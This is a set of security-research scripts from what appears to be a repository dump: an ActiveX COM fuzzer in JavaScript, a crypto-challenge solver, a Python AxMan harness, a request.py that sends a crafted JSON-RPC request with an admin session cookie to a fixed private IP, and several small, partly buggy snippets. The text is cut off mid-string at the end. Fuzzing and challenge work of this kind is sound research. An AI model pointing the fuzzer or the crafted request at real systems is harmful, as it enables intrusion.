null;\n\t\t\txhr.open(\"POST\", \"http://localhost:9000/\" , true);\n\t\t\txhr.send(\"FuzzMethod: \" + method + \" MSG: \" + window.status);\n\t\t\talert(method);\n\t\t\teval('tmp = obj.' + f['Name']);\n\t\t} catch(e) {}\n\t}\n}\n// Attempt to set the value of each property to its initial value\nfunction fuzzReadWriteProperties(obj) {\n\tvar fs = ax[clsid]['Functions'];\n\tif (! fs)\n\t\treturn;\n\tfor (var i = 0; i < ax[clsid]['FunctionCount']; i++) {\n\t\tvar f = fs[i];\n\t\t// Skip all methods but the properties\n\t\tif (! (f && f['Name'] && f['Type'] == 'PropGet'))\n\t\t\tcontinue;\n\n\t\twindow.status = clsid + \" PropSet (Same) \" + f['Name'];\n\t\tmethod = \"fuzzReadWriteProperties\";\n\t\tvar tmp = null;\n\t\ttry {\n\t\t\txhr.open(\"POST\", \"http://localhost:9000/\" , true);\n\t\t\txhr.send(\"FuzzMethod: \" + method + \" MSG: \" + window.status);\n\t\t\talert(method);\n\t\t\teval('tmp = obj.' + f['Name']);\n\t\t} catch(e) {}\n\t\ttry {\n\t\t\txhr.open(\"POST\", \"http://localhost:9000/\" , true);\n\t\t\txhr.send(\"FuzzMethod: \" + method + \" MSG: \" + window.status);\n\t\t\talert(method);\n\t\t\teval('obj.' + f['Name'] + '= tmp');\n\t\t} catch(e) {}\n\t}\n}\n// Attempt to set integer properties to evilProp values\nfunction fuzzNumericProperties(obj) {\n\tvar fs = ax[clsid]['Functions'];\n\tif (! fs)\n\t\treturn;\n\tfor (var i = 0; i < ax[clsid]['FunctionCount']; i++) {\n\t\tvar f = fs[i];\n\t\t// Skip all methods but the properties\n\t\tif (! (f && f['Name'] && (f['Type'] == 'PropPut' || f['Type'] == 'PropPutRef')))\n\t\t\tcontinue;\n\n\t\twindow.status = clsid + \" PropSet (Integer) \" + f['Name'];\n\t\tmethod = \"fuzzNumericProperties\";\n\n\t\t// Read the old value so we can restore it\n\t\tvar old = null;\n\t\ttry {\n\t\t\txhr.open(\"POST\", \"http://localhost:9000/\" , true);\n\t\t\txhr.send(\"FuzzMethod: \" + method + \" MSG: \" + window.status);\n\t\t\talert(method);\n\t\t\teval('old = obj.' + f['Name']); } catch(e) {}\n\t\t// Iterate through all evilProp integer values\n\t\tfor (var x in evilPropNum) {\n\t\t\tvar tst = evilPropNum[x];\n\n\t\t\twindow.status = clsid + \" PropSet (Integer) \" + f['Name'] + ' = ' + tst;\n\t\t\tmethod = \"fuzzNumericProperties2\";\n\n\t\t\ttry {\n\t\t\t\t\txhr.open(\"POST\", \"http://localhost:9000/\" , true);\n\t\t\t\t\txhr.send(\"FuzzMethod: \" + method + \" MSG: \" + window.status );\n\t\t\t\t\talert(method);\n\t\t\t\t\teval('obj.' + f['Name'] + '= tst'); } catch(e) {}\n\t\t}\n\t\t// Restore the original property value\n\t\twindow.status = clsid + \" PropSet (Integer) \" + f['Name'] + ' = (old) ' + old;\n\t\tmethod = \"fuzzNumericProperties3\";\n\n\t\ttry {\n\t\t\txhr.open(\"POST\", \"http://localhost:9000/\" , true);\n\t\t\txhr.send(\"FuzzMethod: \" + method + \" MSG: \" + window.status);\n\t\t\talert(method);\n\t\t\teval('obj.' + f['Name'] + '= old'); } catch(e) {}\n\t}\n}\n\nfunction fuzzStringProperties(obj) {\n\tvar fs = ax[clsid]['Functions'];\n\tif (! fs)\n\t\treturn;\n\tfor (var i = 0; i < ax[clsid]['FunctionCount']; i++) {\n\t\tvar f = fs[i];\n\t\t// Skip all methods but the properties\n\t\tif (! (f && f['Name'] && (f['Type'] == 'PropPut' || f['Type'] == 'PropPutRef')))\n\t\t\tcontinue;\n\t\twindow.status = clsid + \" PropSet (String) \" + f['Name'];\n\t\tmethod = \"fuzzStringProperties\";\n\t\t// Read the old value so we can restore it\n\t\tvar old = null;\n\t\ttry {\n\t\t\txhr.open(\"POST\", \"http://localhost:9000/\" , true);\n\t\t\txhr.send(\"FuzzMethod: \" + method + \" MSG: \" + window.status);\n\t\t\talert(method);\n\t\t\teval('old = obj.' + f['Name']);\n\t\t} catch(e) {}\n\t\t// Iterate through all evilProp string values\n\t\tfor (var x in evilPropStr) {\n\t\t\tvar tst = evilPropStr[x];\n\t\t\t// Tracer magic\n\t\t\tif (tst.toString().indexOf(magic) != -1) {\n\t\t\t\tvar tcls = clsid.toString();\n\t\t\t\ttcls = tcls.replace(\"{\", \"\");\n\t\t\t\ttcls = tcls.replace(\"}\", \"\");\n\t\t\t\ttst = tst.toString() + '_' + tcls + '_' + f['Name'];\n\t\t\t}\n\t\t\twindow.status = clsid + \" PropSet (String) \" + f['Name'] + ' = ' + tst.length;\n\t\t\tmethod = \"fuzzStringProperties2\";\n\t\t\ttry {\n\t\t\t\txhr.open(\"POST\", \"http://localhost:9000/\" , true);\n\t\t\t\txhr.send(\"FuzzMethod: \" + method + \" MSG: \" + window.status);\n\t\t\t\talert(method);\n\t\t\t\teval('obj.' + f['Name'] + '= tst');\n\t\t\t} catch(e) {}\n\t\t}\n\t\t// Restore the original property value\n\t\twindow.status = clsid + \" PropSet (String) \" + f['Name'] + ' = (old) ' + old;\n\t\tmethod = \"fuzzStringProperties3\";\n\t\ttry {\n\t\t\txhr.open(\"POST\", \"http://localhost:9000/\" , true);\n\t\t\txhr.send(\"FuzzMethod: \" + method + \" MSG: \" + window.status);\n\t\t\talert(method);\n\t\t\teval('obj.' + f['Name'] + '= old');\n\t\t} catch(e) {}\n\t}\n}\n\nfunction fuzzObjectProperties(obj) {\n\tvar fs = ax[clsid]['Functions'];\n\tif (! fs)\n\t\treturn;\n\tfor (var i = 0; i < ax[clsid]['FunctionCount']; i++) {\n\t\tvar f = fs[i];\n\t\t// Skip all methods but the properties\n\t\tif (! (f && f['Name'] && (f['Type'] == 'PropPut' || f['Type'] == 'PropPutRef')))\n\t\t\tcontinue;\n\t\twindow.status = clsid + \" PropSet (String) \" + f['Name'];\n\t\tmethod = \"fuzzObjectProperties\";\n\t\t// Read the old value so we can restore it\n\t\tvar old = null;\n\t\ttry {\n\t\t\txhr.open(\"POST\", \"http://localhost:9000/\" , true);\n\t\t\txhr.send(\"FuzzMethod: \" + method + \" MSG: \" + window.status);\n\t\t\talert(method);\n\t\t\teval('old = obj.' + f['Name']); }\n\t\tcatch(e) {}\n\n\t\t// Iterate through all evilProp object values\n\t\tfor (var x in evilPropObj) {\n\t\t\tvar tst = evilPropObj[x];\n\t\t\twindow.status = clsid + \" PropSet (String) \" + f['Name'] + ' = ' + x;\n\t\t\tmethod = \"fuzzObjectProperties2\";\n\t\t\ttry {\n\t\t\t\txhr.open(\"POST\", \"http://localhost:9000/\" , true);\n\t\t\t\txhr.send(\"FuzzMethod: \" + method + \" MSG: \" + window.status);\n\t\t\t\talert(method);\n\t\t\t\teval('obj.' + f['Name'] + '= tst');\n\t\t\t} catch(e) {}\n\t\t}\n\t\t// Restore the original property value\n\t\twindow.status = clsid + \" PropSet (String) \" + f['Name'] + ' = (old) ' + old;\n\t\tmethod = \"fuzzObjectProperties3\";\n\t\ttry {\n\t\t\txhr.open(\"POST\", \"http://localhost:9000/\" , true);\n\t\t\txhr.send(\"FuzzMethod: \" + method + \" MSG: \" + window.status);\n\t\t\talert(method);\n\t\t\teval('obj.' + f['Name'] + '= old');\n\t\t} catch(e) {}\n\t}\n}\n\nfunction fuzzMethods(obj) {\n\tvar fs = ax[clsid]['Functions'];\n\tif (! fs)\n\t\treturn;\n\tfor (var i = 0; i < ax[clsid]['FunctionCount']; i++) {\n\t\tvar f = fs[i];\n\t\t// Skip all the properties\n\t\tif (! (f && f['Name'] && ! f['Type']))\n\t\t\tcontinue;\n\n\t\twindow.status = clsid + \" Method (Init) \" + f['Name'];\n\t\tmethod = \"fuzzMethods\";\n\t\tcreateEvilMethArgs(f['ArgCount']);\n\t\tfuzzMethodArgs(obj, f['Name'], f['ArgCount'], new Array());\n\t\tdestroyEvilMethArgs();\n\t}\n}\n// This routine should be unrolled and use setTimeout()\nfunction fuzzMethodArgs(obj, meth, argc, argv) {\n\tvar tStr = 0;\n\tvar tNum = 1;\n\tvar tObj = 2;\n\t// Arguments are set, make the call\n\tif (! argc || argc == 0) {\n\t\tvar mcall = 'obj.' + meth + '(';\n\t\tvar targv = new Array();\n\t\tvar info = mcall;\n\t\tfor (var aidx = 0; aidx < argv.length; aidx++) {\n\t\t\tif (aidx > 0) {\n\t\t\t\tmcall += ', ';\n\t\t\t\tinfo += ',';\n\t\t\t}\n\t\t\tif (argv[aidx][0] == tStr) {\n\t\t\t\ttargv[aidx] = evilMethStr[argv[aidx][1]].toString();\n\t\t\t\t// Tracer magic\n\t\t\t\tif (evilMethStr[argv[aidx][1]].toString().indexOf(magic) != -1) {\n\t\t\t\t\tvar tcls = clsid.toString();\n\t\t\t\t\ttcls = tcls.replace(\"{\", \"\");\n\t\t\t\t\ttcls = tcls.replace(\"}\", \"\");\n\t\t\t\t\ttargv[aidx] = targv[aidx] + '_' + tcls + '_' + meth;\n\t\t\t\t}\n\t\t\t\tinfo += 'evilMethStr[' + argv[aidx][1] + ']('+targv[aidx].length+')';\n\t\t\t\tmcall += 'targv[' + aidx + ']';\n\t\t\t}\n\t\t\telse if (argv[aidx][0] == tNum) {\n\t\t\t\ttargv[aidx] = evilMethNum[argv[aidx][1]];\n\t\t\t\tinfo += ' evilMethNum[' + argv[aidx][1] + ']('+targv[aidx]+')';\n\t\t\t\tmcall += 'targv[' + aidx + ']';\n\t\t\t}\n\t\t\telse if (argv[aidx][0] == tObj) {\n\t\t\t\tinfo += ' evilMethObj[' + argv[aidx][1] + ']('+typeof(argv[aidx][0])+')';\n\t\t\t\ttargv[aidx] = evilMethObj[argv[aidx][1]];\n\t\t\t\tmcall += 'targv[' + aidx + ']';\n\t\t\t} else {\n\t\t\t\t// ERROR CONDITION\n\t\t\t\tthrow(\"Invalid argument type\");\n\t\t\t}\n\t\t}\n\t\tmcall += ')';\n\t\tinfo += ')';\n\t\t// Write this to the status bar\n\t\twindow.status = clsid + ' ' + info;\n\t\tmethod = \"fuzzMethodArgs\";\n\t\t// Execute the method\n\t\ttry { eval(mcall); } catch(e) { }\n\t\t// alert(mcall);\n\t\treturn(0);\n\t}\n\t// Simple test for many-argument methods\n\tif (argv.length == 0 && (argc > evilMethSlowMax || argc < evilMethSlowMin)) {\n\t\t// Numeric testing\n\t\tfor (var eidx in evilMethNum) {\n\t\t\tvar argx = new Array();\n\t\t\tfor (var x = 0; x < argc; x++)\n\t\t\t\targx[x] = new Array(tNum, eidx);\n\n\t\t\tfuzzMethodArgs(obj, meth, 0, argx);\n\t\t}\n\t\t// String testing\n\t\tfor (var eidx in evilMethStr) {\n\t\t\tvar argx = new Array();\n\t\t\tfor (var x = 0; x < argc; x++)\n\t\t\t\targx[x] = new Array(tStr, eidx);\n\n\t\t\tfuzzMethodArgs(obj, meth, 0, argx);\n\t\t}\n\t\t// Object testing\n\t\tfor (var eidx in evilMethObj) {\n\t\t\tvar argx = new Array();\n\t\t\tfor (var x = 0; x < argc; x++)\n\t\t\t\targx[x] = new Array(tObj, eidx);\n\n\t\t\tfuzzMethodArgs(obj, meth, 0, argx);\n\t\t}\n\t\treturn(0);\n\t}\n\t// Slow mode testing - all permutations of args\n\t// Copy current args\n\tvar argx = new Array();\n\tfor (var argi in argv) argx[argi] = argv[argi];\n\t// What index does this level set?\n\tvar argi = argx.length;\n\t// Numeric testing\n\tfor (var eidx in evilMethNum) {\n\t\targx[argi] = new Array(tNum, eidx);\n\t\tfuzzMethodArgs(obj, meth, argc - 1, argx);\n\t}\n\t// String testing\n\tfor (var eidx in evilMethStr) {\n\t\targx[argi] = new Array(tStr, eidx);\n\t\tfuzzMethodArgs(obj, meth, argc - 1, argx);\n\t}\n\t// Object testing\n\tfor (var eidx in evilMethObj) {\n\t\targx[argi] = new Array(tObj, eidx);\n\t\tfuzzMethodArgs(obj, meth, argc - 1, argx);\n\t}\n}" }, { "alpha_fraction": 0.5759327411651611, "alphanum_fraction": 0.5937992930412292, "avg_line_length": 20.873563766479492, "blob_id": "2a35f49d769b2368c428ae1647fdb324737d43f2", "content_id": "49575eb1c4f40ad063b08c327a711d2cc99512e1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 1903, "license_type": "no_license", "max_line_length": 139, "num_lines": 87, "path": "/ruby/crypto.rb", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "require 'rest-client'\nrequire 'json'\nrequire 'pp'\nrequire 'base64'\n\nclass CryptoAPI\n\n def initialize(email)\n @base = 'http://*c*r*y*p**to**.pr**aetor**i*an.*com'\n @email = email\n @token = self.token\n end\n\n def token\n data = {'email' => @email}.to_json\n ret = RestClient.post \"#{@base}/api-token-auth/\", data, :content_type => :json, :accept => :json\n JSON.parse(ret)['token']\n end\n\n def fetch(level)\n ret = RestClient.get \"#{@base}/challenge/#{level}/\", :content_type => :json, :accept => :json, :Authorization => \"JWT #{@token}\"\n JSON.parse(ret)\n end\n\n def solve(level, guess)\n data = {'guess' => guess}\n ret = RestClient.post \"#{@base}/challenge/#{level}/\", data, :content_type => :json, :accept => :json, :Authorization => \"JWT #{@token}\"\n JSON.parse(ret)\n end\n\n def status\n ret = RestClient.get \"#{@base}/hash/\", :content_type => :json, :accept => :json, :Authorization => \"JWT #{@token}\"\n JSON.parse(ret)\n end\n\nend\n\n# Class values\n# Declare Class\ncrypto = CryptoAPI.new('blah')\n\n# Fetch level \nlevel = 3\npp data = crypto.fetch(level)\n\n# Caesar Cipher 3 - 4 Level 1\n#-----------\n#-----------\n#guess = []\n\n#data['challenge'].split(//).each do |char|\n # num = char.ord\n # -- needed to convert lowercase xyz manually bc they are converted to weird symbols\n #if num == 120 #x\n #num = 97\n #elsif num == 121 #y\n #num = 98\n #elsif num == 122 #z\n #num = 99\n #else\n #num += 3\n #end\n #char = num.chr\n #guess << char\n#end\n\n#pp guess = guess.join\n#----------\n#----------\n\n# Base64 Level 2\n# laughable i know\n# guess = data['challenge'].split(',')\n\n# guess = Base64.decode64(guess[1])\n# was more code here but it magically disappeared\n# guess = guess[-50..-17]\n\n# pp guess\n\npp guess\npp crypto.solve(level, guess)\npp d = crypto.status\n\nputs '*P*r*&aetor**ian C*ryp*t*o C**hal**lenge'\nputs \" Level: #{d['level']}\"\nputs \" Hash: #{d['hash']}\"\n" }, { "alpha_fraction": 0.5557655692100525, "alphanum_fraction": 0.5727788209915161, "avg_line_length": 17.275861740112305, "blob_id": "9de413a5013723dd95b48a4a653d3182ccb0f275", "content_id": "a628b4dde74af0e786c675be457fa37cbf1a6114", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 529, "license_type": "no_license", "max_line_length": 58, "num_lines": 29, "path": "/python/Module-2/processes.py", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "__author__ = 'ma11ock'\n\n\nimport os\n\n\ndef child_process():\n\n print(\"I am the child & my pid is: %d\" % os.getpid())\n print(\"child is exiting\")\n\n\ndef parent_process():\n\n print(\"I am the parent & my pid is: %d\" % os.getpid())\n childpid = os.fork()\n\n if childpid == 0:\n #we are inside child\n child_process()\n else:\n #we are inside the parent process\n print(\"inside parent\")\n print(\"our child has the pid: %d\" % childpid)\n\n\nparent_process()\n\nos.execvp(\"ping\", [\"ping\", \"127.0.0.1\"])" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.6814814805984497, "avg_line_length": 15.875, "blob_id": "c6cc28dc1e3dc5c8e3a7ad5f4e6eacd1691afc28", "content_id": "655a65244cf9ffca9496457f01a6541e57dcd2c9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 135, "license_type": "no_license", "max_line_length": 47, "num_lines": 8, "path": "/python/Module-2/subprocess.py", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport subprocess\n\n__author__ = 'ma11ock'\n\n# subprocess example\n\nfiles = subprocess.checkout(['ls']).split('\\n')\n" }, { "alpha_fraction": 0.5928366780281067, "alphanum_fraction": 0.6011461615562439, "avg_line_length": 24.846153259277344, "blob_id": "99012f7502bd5764bde6ec13503fee30e26f2217", "content_id": "e57e8564a509d659f856a4c36b172a2a0c37c99c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6980, "license_type": "no_license", "max_line_length": 76, "num_lines": 260, "path": "/FaX/html/comfuncs.py", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\r\nfrom _winreg import *\r\nimport os, subprocess, shutil, filecmp, re\r\nfrom shutil import copy\r\nfrom filecmp import dircmp\r\n\r\n# def get_clsids():\r\n # #read all clsids from registry\r\n # areg = ConnectRegistry(None,HKEY_CLASSES_ROOT)\r\n # akey = OpenKey(areg, r\"CLSID\")\r\n # i = 1\r\n # clsids = []\r\n # while True:\r\n \t# try:\r\n \t\t# tmp = EnumKey(akey, i)\r\n \t\t# clsids.append(tmp)\r\n \t\t# i +=1\r\n \t# except WindowsError as e:\r\n \t\t# print \"[+] Finish reading all CLSIDs...\"\r\n \t\t# break\r\n\r\n # return clsids\t\t\r\n \r\n\r\n# def save_clsids_file(file_name):\r\n\t# #save the clisid to a file\r\n\t# clsids = get_clsids()\r\n\t# try:\r\n\t\t# f = open(file_name, 'w')\r\n\t# except IOError:\r\n\t\t# print \"Error: File %s open error\" % file_name\r\n\t\t# return 0\t\r\n\r\n\t# for item in clsids:\r\n\t\t# print >>f, item\r\n\t\t\r\n\r\n# def diff_clsid_files(baseline_clsids, new_clsids, diff_result):\r\n\t# #diff two clsid files and save to diff_result js file\r\n\t# #all clsids are saved in an array in js file\r\n\t# clsids = []\r\n\t# if filecmp.cmp(baseline_clsids, new_clsids):\r\n\t\t# print \"[-] No new clsid found...\"\r\n\t\t# return 0\r\n\r\n\t# try:\r\n\t\t# f_base = open(baseline_clsids, 'r')\r\n\t# except IOError:\r\n\t\t# print \"Error: File %s open error\" % baseline_clsids\r\n\t\t# return 0\t\r\n\r\n\t# try:\r\n\t\t# f_new = open(new_clsids, 'r')\r\n\t# except IOError:\r\n\t\t# print \"Error: File %s open error\" % new_clsids\r\n\t\t# return 0\r\n\r\n\t# try:\r\n\t\t# f_diff = open(diff_result, 'w')\t\r\n\t# except IOError:\r\n\t\t# print \"Error: File %s open error\" % file_name\r\n\t\t# return 0\r\n\r\n\t# base_lines = f_base.readlines()\r\n\t# new_lines = f_new.readlines()\r\n\r\n\t# global CID\r\n\t# CID = clsids\r\n\t# #read clsid diff\r\n\t# for item in new_lines:\r\n\t\t# if item not in base_lines:\r\n\t\t\t# clsids.append(item.rstrip('\\n'))\r\n\t\t\r\n # # create object.js file\r\n\t# f_diff.write(\"var ax_objects = new Array(\\n\")\r\n\t# f_diff.write(\"'CLSID',\\n\")\t\r\n\t# for item in clsids[0:-1]:\r\n\t\t# f_diff.write(\"'%s',\\n\" % item)\r\n\r\n\t# #no , follow last clsid\t\r\n\t# f_diff.write(\"'%s'\\n\" % clsids[-1])\t\r\n\t# f_diff.write(\"};\")\r\n\r\n#match clsid pattern with a string\r\ndef match_clsid_pattern(line):\r\n\tif re.match(r'\\{\\w{8}-\\w{4}-\\w{4}-\\w{4}-\\w{12}\\}.js', line):\r\n\t\tline = line.rstrip('\\n').rstrip(',').replace(\"'\",\"\")\t\r\n\t\treturn line\r\n\r\n\r\n#generate js file for each clsid\t\r\n# def generate_clsid_js_file(diff_result):\r\n\t# clsids = []\r\n\t# try:\r\n\t\t# f_diff = open(diff_result, 'r')\t\r\n\t# except IOError:\r\n\t\t# print \"Error: File %s open error\" % file_name\r\n\t\t# return 0\r\n\r\n\t# lines = f_diff.readlines()\r\n\r\n\t# for line in lines:\r\n\t\t# item = match_clsid_pattern(line)\r\n\t\t# if item is not None:\r\n\t\t\t# clsids.append(item)\r\n\r\n\r\n\t# #read registry to find entry match the clsid\r\n\t# try:\r\n\t\t# areg = ConnectRegistry(None,HKEY_CLASSES_ROOT)\r\n\t# except WindowsError as e:\r\n\t\t# print \"[-] ConnectRegistry failed ...\"\r\n\t\t# exit(0)\r\n\r\n\t# try:\r\n\t\t# akey = OpenKey(areg, r\"CLSID\")\r\n\t# except WindowsError as e:\r\n\t\t# print \"[-] OpenKey CLSID failed ...\"\r\n\t\t# exit(0)\r\n\r\n\t# i = 1\r\n\t# while True:\r\n\t\t# try:\r\n\t\t\t# tmp = EnumKey(akey, i)\r\n\t\t\t# if tmp in clsids:\r\n\t\t\t\t# try:\r\n\t\t\t\t\t# subkey = OpenKey(akey, tmp)\r\n\t\t\t\t# except WindowsError as e:\r\n\t\t\t\t\t# print \"[-] OpenKey %s failed ...\" % tmp\r\n\t\t\t\t\t# continue\r\n\t\t\t\t# try:\t \t\r\n\t\t\t\t\t# subsubkey = OpenKey(subkey, r\"InprocServer32\")\r\n\t\t\t\t# except WindowsError as e:\r\n\t\t\t\t\t# print \"[-] OpenKey InprocServer32 failed ...\"\r\n\t\t\t\t\t# continue\t\r\n\t\t\t\t# try:\r\n\t\t\t\t\t# server = QueryValue(subsubkey, \"\")\r\n\t\t\t\t# except WindowsError as e:\r\n\t\t\t\t\t# print \"[-] QueryValue InprocServer32 failed ...\"\r\n\t\t\t\t\t# continue\r\n\t\t\t\t# #create js file now...\r\n\t\t\t\t# create_clsid_js(server, tmp)\t\t\r\n\t\t\t# i +=1\r\n\t\t# except WindowsError as e:\r\n\t\t\t# print \"[+] Finish reading all CLSIDs...\"\r\n\t\t\t# break\r\n\r\n\r\n# def create_clsid_js(server, clsid):\r\n\t# file_name = \"html//conf//\" + clsid + \".js\"\r\n\t# try:\r\n\t\t# clsid_js = open(file_name, 'w')\t\r\n\t# except IOError:\r\n\t\t# print \"Error: File %s open error\" % clsid\r\n\t\t# return 0\r\n\t# #start to write the content to the file\t\r\n\t# clsid_js.write(\"var ax_name = '%s';\\n\" % clsid)\r\n\t# clsid_js.write(\"ax[ax_name] = new Array();\\n\")\r\n\t# clsid_js.write(\"ax[ax_name]['Server'] = '%s';\\n\" % server)\r\n\t\r\n# diff_clsid_files(\"clisid.txt\", \"new.txt\", \"diff_result.js\")\r\n# generate_clsid_js_file(\"diff_result.js\")\r\n\r\n\r\ndef create_objects_js(save_dir):\r\n\tfile_name = save_dir + \"\\\\objects.js\"\r\n\r\n\ttry:\r\n\t\tobjects = open(file_name, 'w')\r\n\texcept IOError:\r\n\t\tprint \"Error: File %s open error\" % file_name\r\n\t\treturn 0\r\n\r\n\t#write objects.js content:\r\n\tobjects.write(\"var ax_objects = new Array(\\n\")\r\n\tobjects.write(\"'CLSID',\\n\")\r\n\t\r\n\tfor files in os.listdir(save_dir):\r\n\t\tif match_clsid_pattern(files):\r\n\t\t\tobjects.write(\"'\" + files[0:-3] + \"',\" + \"\\n\")\r\n\r\n\t#remove last item's ,\r\n\tobjects.seek(-3, os.SEEK_END)\r\n\tobjects.truncate()\t\t\r\n\tobjects.write(\"\\n);\")\t\r\n\r\n\r\ndef run_axman(axman_path, js_file_folder):\r\n\t#change the axman.exe path\r\n\taxman = axman_path +\"\\\\\" + \"axman.exe\"\r\n\tsubprocess.call([axman, js_file_folder])\r\n\r\n\r\n# def copy_diff_files(dcmp, save_dir):\r\n\t# for name in dcmp.diff_files:\r\n\t\t# subprocess.call([\"copy\", dcmp.right,name, save_dir])\r\n\t\t# #os.system('copy %s\\\\%s %s' %(dcmp.right,name, save_dir))\r\n\t\t# print \"diff_file %s found in %s and %s\" % (name, dcmp.left, dcmp.right)\r\n\r\n\r\n#run axman first time, get baseline\r\ndef baseline_generate(axman_path, js_file_folder1):\r\n\tprint \"[+] running axman\"\r\n\tprint \"[+] generating baseline\"\r\n\trun_axman(axman_path, js_file_folder1)\r\n\t\r\n\r\n#diff js files \r\ndef diff_js_files(js_file_folder1, js_file_folder2):\r\n\tdir1_list = []\r\n\tdir2_list = []\r\n\r\n\tfor files in os.listdir(js_file_folder1):\r\n\t\tif match_clsid_pattern(files):\r\n\t\t\tdir1_list.append(files)\r\n\r\n\tfor files in os.listdir(js_file_folder2):\r\n\t\tif match_clsid_pattern(files):\r\n\t\t\tdir2_list.append(files)\t\r\n\r\n\tresult = set(dir1_list) ^ set(dir2_list)\r\n\r\n\treturn result\t\r\n\r\n#run axman second time, get all objects, diff \r\ndef diff_generate(axman_path, js_file_folder1, js_file_folder2, save_dir):\r\n\tif not os.path.exists(axman_path):\r\n\t\tprint \"axman path error\"\r\n\t\texit(1)\r\n\tif not os.path.exists(js_file_folder1):\r\n\t\tprint \"baseline js file folder error\"\r\n\t\texit(1)\r\n\tif not os.path.exists(js_file_folder2):\r\n\t\tos.mkdir(js_file_folder2)\r\n\tif not os.path.exists(save_dir):\r\n\t\tos.mkdir(save_dir)\t\r\n\r\n\tprint \"[+] running axman\"\r\n\tprint \"[+] generating target files\"\r\n\trun_axman(axman_path, js_file_folder2)\r\n\r\n\t#diff js files here\r\n\tdiff = diff_js_files(js_file_folder1, js_file_folder2)\r\n\t\r\n\tfor files in diff:\r\n\t\tsrc = js_file_folder2 + \"\\\\\" + files\t\r\n\t\tdst = save_dir\r\n\t\tprint \"[+] copying \" + files + \"\\n - to \" + dst\r\n\t\tcopy(src,dst)\r\n\t\t#os.system('copy %s\\\\%s %s\\\\%s' %(js_file_folder2, files, save_dir,files))\r\n\r\n\t#create new objects.js\r\n\tcreate_objects_js(save_dir)\r\n\r\n\t#copy CLSID.js to save_dir\r\n\tsrc_clsid = js_file_folder2 + \"\\\\\" + \"CLSID.js\"\r\n\tdst_clsid = save_dir\r\n\tprint \"[+] copying \" + src_clsid + \"\\n - to \" + dst_clsid\r\n\tcopy(src_clsid,dst_clsid)\r\n\t#os.system('copy %s\\\\CLSID.js %s\\\\CLSID.js' %(js_file_folder2, save_dir))\r\n" }, { "alpha_fraction": 0.5470967888832092, "alphanum_fraction": 0.6161290407180786, "avg_line_length": 36.80487823486328, "blob_id": "0d1b95511070ed68fc0d6c116989669acc41bed7", "content_id": "575513cdaa3bf5e02150b226268894ce16df6cf3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1550, "license_type": "no_license", "max_line_length": 136, "num_lines": 41, "path": "/python/request.py", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n# send a POST/ data to an ip address/port\nimport socket, sys\nimport random\n\ndef create_attack():\n buf = ''\n num = random.randrange(25,101)\n\n for i in range(num):\n alpha = random.randrange(7,127)\n buf += chr(alpha)\n\n buffer =\"POST https://10.219.101.161/jsonrpc/get_value HTTP/1.0\\r\\n\"\n buffer += \"Host: 10.219.101.161\\r\\n\"\n buffer += \"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;)\\r\\n\"\n buffer += \"Pragma: no-cache\\r\\n\"\n buffer += \"X-Requested-With: XMLHttpRequest\\r\\n\"\n buffer += \"Referrer: https://10.219.101.161/index.html\\r\\n\"\n buffer += \"Cookie: testme=cookie; uid=admin; sessid_443=sess5CeHMY7jf/ecTE00MNCzgA==\\r\\n\\r\\n\"\n buffer += '{\"jsonrpc\": \"2.0\",\"id\": 3,\"method\": \"get_value\",\"params\":{\"th\": \"th\",\"path\": \"/users:users/current_user/privlevel\"}}\\r\\n'\n\n # buffer = 'POST /jsonrpc/login HTTP/1.0\\r\\n'\n # buffer += 'Host: 10.219.101.161\\r\\n'\n # buffer += 'User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;)\\r\\n'\n # buffer += 'Pragma: no-cache\\r\\n'\n # buffer += 'Referer: https://10.219.101.161/login.html\\r\\n'\n # buffer += 'Cookie: testme=cookie; uid=admin\\r\\n'\n # buffer += 'Connection: keep-alive\\r\\n\\r\\n'\n\n #buffer += '{\"jsronrpc\":\"2.0\",\"id\":1,\"method\":\"login\",\"params\":{\"user\":\"admin\",\"passwd\":\"\"}}'\n print buffer\n return buffer\n\ndef send_attack():\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.connect((\"10.219.101.161\",443))\n sock.send(create_attack())\n sock.close()\n\nsend_attack()\n" }, { "alpha_fraction": 0.6345381736755371, "alphanum_fraction": 0.6385542154312134, "avg_line_length": 18.153846740722656, "blob_id": "8db4d6f7c9fc1a02d8d3a703fc80668fbf3917e8", "content_id": "47cead49d97ec638897a57e3140cfd6b9005d745", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 249, "license_type": "no_license", "max_line_length": 37, "num_lines": 13, "path": "/python/dumpmodules.py", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nimport pefile,pprint\n\nprint \"./script path/to/file\"\n\n# not pretty just has to work!\nfile=sys.argv[1]\npe=pefile.PE(file)\n\nfor dll in pe.DIRECTORY_ENTRY_IMPORT:\n print '[+] Imported DLLs [+]'\n print '[+] ' , entry.dll, ' [+]'\n" }, { "alpha_fraction": 0.6504030823707581, "alphanum_fraction": 0.6537972092628479, "avg_line_length": 24.344085693359375, "blob_id": "fd831deb430b1a69c4e88d5dce745775e8dc9ec9", "content_id": "9ebe6275b6575362229e0548281190f1dd5d9924", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2357, "license_type": "no_license", "max_line_length": 92, "num_lines": 93, "path": "/FaX/html/pydbg_script.py", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "# pydbg_script.py\n\nimport sys\nimport os\nfrom os import *\nimport pydbg\nfrom pydbg import *\nfrom pydbg.defines import *\nimport shutil\nfrom threading import Timer\n\nif len(sys.argv) < 6:\n\tprint \"USAGE: 